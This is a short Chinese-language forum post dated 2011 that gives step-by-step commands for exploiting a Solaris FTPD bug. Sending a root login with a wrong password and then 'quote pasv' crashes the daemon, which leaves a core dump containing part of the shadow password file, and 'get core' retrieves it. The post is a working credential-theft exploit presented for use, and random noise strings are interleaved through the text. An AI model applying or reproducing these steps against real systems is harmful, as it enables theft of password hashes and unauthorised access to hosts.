該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG,使得用戶可以獲得該機(jī)的口令文件。具體過程如下:& ]8 q" R) r" P7 |% i- x* C
, x' ~) a% j1 V+ U& t7 I0 S
1.通過 ftp 正常登錄到目的主機(jī)上
# c+ A3 z& E t$ O+ y2 t( e; S0 i6 k# _1 U
2.輸入如下命令序列:
% h' q8 P$ H1 c: O
& ?% Z# z9 k! [ftp> user root wrongpasswd
# s0 n; [8 B1 X8 A% C- f7 F1 Z! Q# P7 W8 `7 l {' s5 `
ftp> quote pasv
: h1 f+ F. s& z) K
( E6 J: O! T4 U& B2 L3 d+ \9 T( {3.這時(shí),ftpd會(huì)報(bào)錯(cuò)退出�,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core�����,口令文件就包含在這個(gè)core中��。' n' G' \+ G' a! c+ l
! B; c* \6 a) L' d- I4.再次進(jìn)入FTP >get core
# F4 \1 f& ]3 P4 j! e! ]+ T& {% ^: i
補(bǔ)充:雖然在core只有一部分shadow����,但是對于系統(tǒng)來說已經(jīng)是致命的打擊了) i0 S9 U2 N# v
& J3 o. M4 E# W) Y0 Y0 @, z/ S( G$ ?
|
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡